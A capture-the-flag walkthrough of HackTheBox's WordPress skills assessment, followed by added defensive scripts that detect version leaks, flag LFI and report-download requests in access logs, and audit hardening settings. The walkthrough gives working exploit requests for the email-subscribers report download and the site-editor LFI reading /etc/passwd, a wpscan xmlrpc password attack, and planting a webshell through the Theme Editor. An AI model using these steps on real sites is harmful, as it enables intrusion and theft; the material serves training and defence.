HackTheBox - Hacking WordPress - Skills Assessment Walkthrough


Scenario
You have been contracted to perform an external penetration test against the company INLANEFREIGHT
that is hosting one of their main public-facing websites on WordPress.
Enumerate the target thoroughly using the skills learned in this module to find a variety of flags. Obtain shell access to the webserver to find the final flag.
Walkthrough
Target system: 10.129.204.37
While navigating the website, we notice a 'Blog' button:
Let’s add it to /etc/hosts:
sudo sh -c 'echo "10.129.204.37 blog.inlanefreight.local" >> /etc/hosts'
And we're ready to start!
Q1 - Identify the WordPress version number.
Solution:
We can do this manually by reviewing the client’s source code, CSS, JavaScript, and readme.html. However, I will use the WPScan tool to quickly gather all the information about the WordPress web application and answer the next few questions:
wpscan --url http://blog.inlanefreight.local
The WordPress version of the web application has been found!
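For a defender who wants to confirm that a site has stopped advertising its version, the manual method mentioned above (the generator meta tag, the ?ver= query strings on core assets, and readme.html) is easy to script. The following is an added example and not part of the original walkthrough; the HTML and readme fragments are constructed, and the version string 5.1.6 in them is made up rather than the target's real version.

```python
import re
from typing import Dict, List, Optional

# Constructed front-page HTML of the kind a WordPress site serves; the version
# string 5.1.6 is made up for the example and is not the target's version.
SAMPLE_HTML = """<!DOCTYPE html>
<html lang="en-US"><head>
<meta charset="UTF-8" />
<meta name="generator" content="WordPress 5.1.6" />
<link rel="stylesheet" href="/wp-includes/css/dist/block-library/style.min.css?ver=5.1.6" />
<script src="/wp-includes/js/wp-embed.min.js?ver=5.1.6"></script>
<script src="/wp-content/plugins/some-plugin/js/main.js?ver=1.2.3"></script>
</head><body></body></html>
"""

# Constructed excerpt of /readme.html, which prints the version in its heading.
SAMPLE_README = """<h1 id="logo">
<a href="https://wordpress.org/"><img alt="WordPress" src="wp-admin/images/wordpress-logo.png" /></a>
<br /> Version 5.1.6
</h1>
"""

GENERATOR_RE = re.compile(r'<meta\s+name="generator"\s+content="WordPress\s+([\d.]+)', re.I)
# Only core assets (under /wp-includes/) carry the core version in ?ver=;
# plugin and theme assets carry their own version numbers and are ignored.
CORE_ASSET_RE = re.compile(r'''/wp-includes/[^"'\s]*\?ver=([\d.]+)''', re.I)
README_RE = re.compile(r'Version\s+([\d.]+)', re.I)


def version_disclosures(html: str, readme: Optional[str] = None) -> Dict[str, Optional[str]]:
    """Report each place the core version leaks; None means that source is clean."""
    result: Dict[str, Optional[str]] = {
        "generator_meta": None,
        "core_asset_query": None,
        "readme_html": None,
    }
    m = GENERATOR_RE.search(html)
    if m:
        result["generator_meta"] = m.group(1)
    versions = sorted(set(CORE_ASSET_RE.findall(html)))
    if versions:
        # Several distinct values would be unusual; report them all rather than pick one.
        result["core_asset_query"] = ",".join(versions)
    if readme is not None:
        m = README_RE.search(readme)
        if m:
            result["readme_html"] = m.group(1)
    return result


def leaking_sources(disclosures: Dict[str, Optional[str]]) -> List[str]:
    """Names of the sources that still reveal a version."""
    return [name for name, value in disclosures.items() if value is not None]


if __name__ == "__main__":
    d = version_disclosures(SAMPLE_HTML, SAMPLE_README)
    print(d)
    print("still leaking:", leaking_sources(d))
```

The three sources are reported separately on purpose: removing the generator tag (for example with remove_action('wp_head', 'wp_generator') in a theme or plugin) does nothing about the ?ver= strings or a readme.html left in the web root, so a hardening pass is only finished when every source comes back None.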
Q2 - Identify the WordPress theme in use.
Solution:
We can find this information in the scan we performed in the previous question:
The WordPress theme in use has been found!
Q3 - Submit the contents of the flag file in the directory with directory listing enabled.
Solution:
We can find this information in the scan we performed in the first question:
Let’s navigate to http://blog.inlanefreight.local/wp-content/uploads/ in the browser:
There we can see the upload_flag.txt file; let’s click it:
Flag found!
Q4 - Identify the only non-admin WordPress user. (Format: <first-name> <last-name>)
Solution:
Let's run enumeration on the WordPress web application:
wpscan --url http://blog.inlanefreight.local --enumerate
We can see the users found through this process:
A non-admin user has been found!
Q5 - Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.
Solution:
During the initial scan in question 1, we identified three plugins that are out of date and therefore potentially vulnerable:
- email-subscribers, version 4.2.2
- site-editor, version 1.1.1
- the-events-calendar, version 5.1.2.1
The next step is to find a known vulnerability in one of these plugins that would allow us to download files without authentication.
After some Google searching, we found the following exploit:
https://www.exploit-db.com/exploits/48698
This exploit takes advantage of an old version of the email-subscribers plugin to download user reports without any authorization. Let’s use this exploit with curl by targeting the path specified:
curl 'http://blog.inlanefreight.local/wp-admin/admin.php?page=download_report&report=users&status=all'
The response is:
And the flag has been found!
Q6 - What is the version number of the plugin vulnerable to an LFI?
Solution:
We conducted another Google search for specific vulnerabilities affecting the following plugins:
- email-subscribers, version 4.2.2
- site-editor, version 1.1.1
- the-events-calendar, version 5.1.2.1
We specifically looked for Local File Inclusion (LFI) vulnerabilities. After the search, we found that:
We identified the specific plugin version vulnerable to the LFI vulnerability!
Q7 - Use the LFI to identify a system user whose name starts with the letter "f".
Solution:
We just need to use a known exploit for site-editor version 1.1.1 to exploit the LFI vulnerability.
You can find the exploit on Exploit-DB:
https://www.exploit-db.com/exploits/44340
Now, let’s use the PoC (Proof-of-Concept):
http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
Then, enter the URL path in our web application:
http://blog.inlanefreight.local/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
User found!
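From the blue-team side, the three findings in Q3, Q5 and Q7 (a directory index served under wp-content/uploads, a hit on the Email Subscribers report download page, and a site-editor ajax_path pointing at an absolute or traversal path) each leave a distinctive line in the web server access log. The script below is an added example and not code from the original walkthrough; the Apache combined-format log lines are constructed, and the client IPs, timestamps, byte counts and user agents in them are invented, while the request paths mirror the ones used in the three questions.

```python
import re
from collections import Counter
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format access log. The client IPs, timestamps, sizes
# and user agents are made up; the request paths mirror those used in Q3, Q5 and Q7.
SAMPLE_LOG = """\
10.10.14.5 - - [10/Mar/2024:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.5 - - [10/Mar/2024:12:00:07 +0000] "GET /wp-content/uploads/ HTTP/1.1" 200 1342 "-" "Mozilla/5.0"
10.10.14.5 - - [10/Mar/2024:12:00:09 +0000] "GET /wp-content/uploads/upload_flag.txt HTTP/1.1" 200 28 "-" "Mozilla/5.0"
10.10.14.5 - - [10/Mar/2024:12:01:30 +0000] "GET /wp-admin/admin.php?page=download_report&report=users&status=all HTTP/1.1" 200 640 "-" "curl/7.88.1"
10.10.14.5 - - [10/Mar/2024:12:02:45 +0000] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.10.14.5 - - [10/Mar/2024:12:02:50 +0000] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=%2Fetc%2Fpasswd HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.10.14.7 - - [10/Mar/2024:12:03:00 +0000] "GET /wp-content/uploads/2020/07/photo.jpg HTTP/1.1" 200 81234 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

UPLOADS_DIR = "/wp-content/uploads/"
ADMIN_PAGE = "/wp-admin/admin.php"
SITE_EDITOR_AJAX = ("/wp-content/plugins/site-editor/editor/extensions/"
                    "pagebuilder/includes/ajax_shortcode_pattern.php")


def classify(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for one access-log line, or None if it is unremarkable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    path = unquote(url.path)
    params = parse_qs(url.query)  # values are percent-decoded here
    status = int(m["status"])

    def finding(kind: str, detail: str) -> Dict[str, str]:
        return {"kind": kind, "ip": m["ip"], "ts": m["ts"], "detail": detail}

    # Q3: a 200 for a directory path (trailing slash, no file name) under uploads
    # means the server answered with an index page, i.e. directory listing is on.
    if path.startswith(UPLOADS_DIR) and path.endswith("/") and status == 200:
        return finding("directory-listing", path)

    # Q5: the Email Subscribers report export. The access log cannot show whether
    # the caller was logged in, so every hit is surfaced for correlation with auth logs.
    if path == ADMIN_PAGE and params.get("page") == ["download_report"]:
        return finding("plugin-report-download", url.query)

    # Q7: ajax_path is meant to name a file inside the plugin; an absolute path or
    # a traversal sequence is the LFI pattern, whether or not it was percent-encoded.
    if path == SITE_EDITOR_AJAX and "ajax_path" in params:
        value = params["ajax_path"][0]
        if value.startswith("/") or ".." in value.replace("\\", "/"):
            return finding("lfi-attempt", value)
    return None


def scan_log(text: str) -> List[Dict[str, str]]:
    """Classify every line and keep only the ones that produced a finding."""
    return [f for f in (classify(line) for line in text.splitlines()) if f]


def per_source(findings: List[Dict[str, str]]) -> Dict[str, Counter]:
    """Count finding kinds per client IP, which is what an alert would key on."""
    out: Dict[str, Counter] = {}
    for f in findings:
        out.setdefault(f["ip"], Counter())[f["kind"]] += 1
    return out


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ts']}  {f['ip']:<12} {f['kind']:<24} {f['detail']}")
    print(per_source(hits))
```

The report-download rule is deliberately noisy: a legitimate administrator exporting subscribers produces the same line, and the log alone cannot distinguish the two, so the value of the finding comes from joining it with the authentication log for the same IP and time window. The LFI rule decodes the query string before matching so that the percent-encoded variant in the sample is caught as well as the plain one.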
Q8 - Obtain a shell on the system and submit the contents of the flag in the /home/erika directory.
Solution:
First, we need to find the credentials of an admin user:
wpscan --password-attack xmlrpc -t 20 -U erika,admin -P ./Desktop/rockyou.txt --url http://blog.inlanefreight.local
--password-attack xmlrpc - perform a password attack against the xmlrpc file.
-t 20 - number of threads to use.
-U erika,admin - list of users to attack.
-P ./Desktop/rockyou.txt - use the rockyou.txt password list for the attack.
We have obtained the username and password of an admin user.
Next, navigate to the WordPress login page at http://blog.inlanefreight.local/wp-admin and log in using Erika’s credentials:
Then, on the main page, go to Appearance and select Theme Editor:
Access an unused theme template (I used twentyseventeen) and insert the PHP webshell code into the 404 template file:
Finally, update the file.
Then, use curl to interact with the webshell. First, run whoami to verify it’s working:
And it works!
Then, locate the flag file in /home/erika and output its content:
Flag successfully found! 😁
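Each step of the Q8 chain, and the Q3 directory listing before it, has a configuration-level fix on the WordPress side: DISALLOW_FILE_EDIT removes the Theme Editor that was used to plant the webshell, restricting xmlrpc.php closes the interface the password attack went through, and Options -Indexes turns off the directory index that exposed the uploads folder. The audit script below is an added example and not code from the walkthrough; the wp-config.php and .htaccess excerpts it checks are constructed, with placeholder database values.

```python
import re
from typing import Dict, List

# Constructed wp-config.php excerpt with none of the hardening constants set
# (database values are placeholders, not from any real site).
WEAK_WP_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'placeholder' );
define( 'WP_DEBUG', false );
$table_prefix = 'wp_';
"""

# Same excerpt with the dashboard file editor switched off.
HARDENED_WP_CONFIG = WEAK_WP_CONFIG.replace(
    "$table_prefix",
    "// Removes Appearance > Theme Editor and Plugins > Plugin Editor\n"
    "define( 'DISALLOW_FILE_EDIT', true );\n$table_prefix",
)

# Constructed .htaccess excerpts: the stock WordPress block, then the same block
# with directory indexing off and xmlrpc.php denied (Apache 2.4 syntax).
WEAK_HTACCESS = """# BEGIN WordPress
RewriteEngine On
RewriteBase /
# END WordPress
"""

HARDENED_HTACCESS = WEAK_HTACCESS + """Options -Indexes
<Files xmlrpc.php>
    Require all denied
</Files>
"""

DEFINE_RE = re.compile(
    r"""define\(\s*['"](\w+)['"]\s*,\s*(true|false|\d+|'[^']*'|"[^"]*")\s*\)""", re.I
)


def php_defines(text: str) -> Dict[str, str]:
    """Extract define('NAME', value) pairs from wp-config.php, skipping commented-out lines."""
    out: Dict[str, str] = {}
    for line in text.splitlines():
        if line.lstrip().startswith(("//", "#")):
            continue
        for name, value in DEFINE_RE.findall(line):
            out[name.upper()] = value.lower()
    return out


def audit_wp_config(text: str) -> List[str]:
    """Flag the constant whose absence let the Theme Editor be used in Q8."""
    findings = []
    if php_defines(text).get("DISALLOW_FILE_EDIT") != "true":
        findings.append("wp-config.php: DISALLOW_FILE_EDIT is not true; the Theme/Plugin Editor can write PHP files")
    return findings


def audit_htaccess(text: str) -> List[str]:
    """Flag directory indexing (Q3) and an unrestricted xmlrpc.php (Q8 password attack)."""
    findings = []
    # Any Options directive carrying -Indexes disables directory listings.
    if not re.search(r"^\s*Options\b[^\n]*-Indexes", text, re.M):
        findings.append(".htaccess: no 'Options -Indexes'; directory listing stays on where no index file exists")
    # Accept a <Files xmlrpc.php> block with either 2.4 ('Require all denied') or 2.2 ('Deny from all') syntax.
    block = re.search(r'<Files\s+"?xmlrpc\.php"?\s*>(.*?)</Files>', text, re.S | re.I)
    if not block or not re.search(r"Require\s+all\s+denied|Deny\s+from\s+all", block.group(1), re.I):
        findings.append(".htaccess: xmlrpc.php is unrestricted; it accepts authentication attempts")
    return findings


def audit(wp_config: str, htaccess: str) -> List[str]:
    """Combined report; an empty list means all three controls are present."""
    return audit_wp_config(wp_config) + audit_htaccess(htaccess)


if __name__ == "__main__":
    print("weak:", *audit(WEAK_WP_CONFIG, WEAK_HTACCESS), sep="\n  ")
    print("hardened:", audit(HARDENED_WP_CONFIG, HARDENED_HTACCESS))
```

Denying xmlrpc.php outright breaks clients that depend on it (the WordPress mobile apps and Jetpack use it), so some sites rate-limit it or restrict it by source address instead; the audit only asks whether it is left completely open. DISALLOW_FILE_EDIT is the control that would have stopped this particular chain even with Erika's password in hand, since the Theme Editor entry simply disappears from the dashboard.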
Written by Ido Abramov